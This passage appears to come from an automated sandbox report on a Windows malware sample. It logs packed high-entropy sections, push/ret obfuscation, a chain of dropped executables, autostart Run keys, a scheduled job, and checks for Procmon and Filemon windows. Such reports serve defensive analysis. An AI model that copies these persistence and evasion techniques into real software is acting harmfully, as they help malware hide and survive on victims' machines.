Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: nulvttal
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: .taggant
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name:
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: .idata
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name:
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: bleglpjp
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: ozncbdew
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: bleglpjp
Source: skotes.exe.3.dr Static PE information: section name: ozncbdew
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name: pfboyhbl
Source: random[1].exe.8.dr Static PE information: section name: mirdfaun
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name:
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: .idata
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: pfboyhbl
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: mirdfaun
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: usisoqoi
Source: random[1].exe0.8.dr Static PE information: section name: igxiqctn
Source: random[1].exe0.8.dr Static PE information: section name: .taggant
Source: 1171a5b648.exe.8.dr Static PE information: section name:
Source: 1171a5b648.exe.8.dr Static PE information: section name: .rsrc
Source: 1171a5b648.exe.8.dr Static PE information: section name: .idata
Source: 1171a5b648.exe.8.dr Static PE information: section name:
Source: 1171a5b648.exe.8.dr Static PE information: section name: usisoqoi
Source: 1171a5b648.exe.8.dr Static PE information: section name: igxiqctn
Source: 1171a5b648.exe.8.dr Static PE information: section name: .taggant
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name:
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: .idata
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: ucxgvins
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: nulvttal
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: .taggant
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name:
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: .idata
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: ucxgvins
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: nulvttal
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: .taggant
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name:
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: .idata
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name:
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: bleglpjp
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: ozncbdew
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C8329 push ebx; ret 0_3_011C8330
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CCF49 push ebx; ret 0_3_011CCF50
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C8BB8 push ebp; retf 0_3_011C8BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C8BB8 push ebp; retf 0_3_011C8BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CD7D8 push ebp; retf 0_3_011CD7E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CEDFB pushad ; ret 0_3_011CEF11
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C8BB8 push ebp; retf 0_3_011C8BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CD7D8 push ebp; retf 0_3_011CD7E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CEDFB pushad ; ret 0_3_011CEF11
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A199D0 push ebp; retf 0_3_05A199D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A199D0 push ebp; retf 0_3_05A199D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A2109B push ebp; ret 0_3_05A210A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A2109B push ebp; ret 0_3_05A210A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A2109B push ebp; ret 0_3_05A210A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1E09D pushad ; ret 0_3_05A1E0A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1E09D pushad ; ret 0_3_05A1E0A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1D028 pushfd ; iretd 0_3_05A1D052
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1D028 pushfd ; iretd 0_3_05A1D052
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1C86F pushad ; retf 0_3_05A1C873
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1C86F pushad ; retf 0_3_05A1C873
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1DC44 push esi; ret 0_3_05A1DC45
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1DC44 push esi; ret 0_3_05A1DC45
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1AFF3 pushad ; ret 0_3_05A1B109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1AFF3 pushad ; ret 0_3_05A1B109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1C7D7 push ebp; retf 0_3_05A1C7EC
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1C7D7 push ebp; retf 0_3_05A1C7EC
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1CEAD push FFFFFF82h; ret 0_3_05A1CEC7
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1CEAD push FFFFFF82h; ret 0_3_05A1CEC7
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A21263 push cs; ret 0_3_05A21271
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A21263 push cs; ret 0_3_05A21271
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A21263 push cs; ret 0_3_05A21271
Source: file.exe Static PE information: section name: entropy: 7.974910173943292
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: entropy: 7.791645043288012
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: entropy: 7.979529969981847
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: bleglpjp entropy: 7.953143642742956
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.979529969981847
Source: skotes.exe.3.dr Static PE information: section name: bleglpjp entropy: 7.953143642742956
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.974910173943292
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: entropy: 7.974910173943292
Source: random[1].exe0.8.dr Static PE information: section name: usisoqoi entropy: 7.953872207980885
Source: 1171a5b648.exe.8.dr Static PE information: section name: usisoqoi entropy: 7.953872207980885
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: entropy: 7.791645043288012
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: entropy: 7.791645043288012
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: entropy: 7.979529969981847
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: bleglpjp entropy: 7.953143642742956
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File created: C:\Users\user\AppData\Local\Temp\5TAVJ2XDPW30B3ZI4A9E75FX93.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File created: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File created: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1171a5b648.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 275df0ca27.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6cadd3f0fd.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6cadd3f0fd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6cadd3f0fd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1171a5b648.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1171a5b648.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 275df0ca27.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 275df0ca27.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
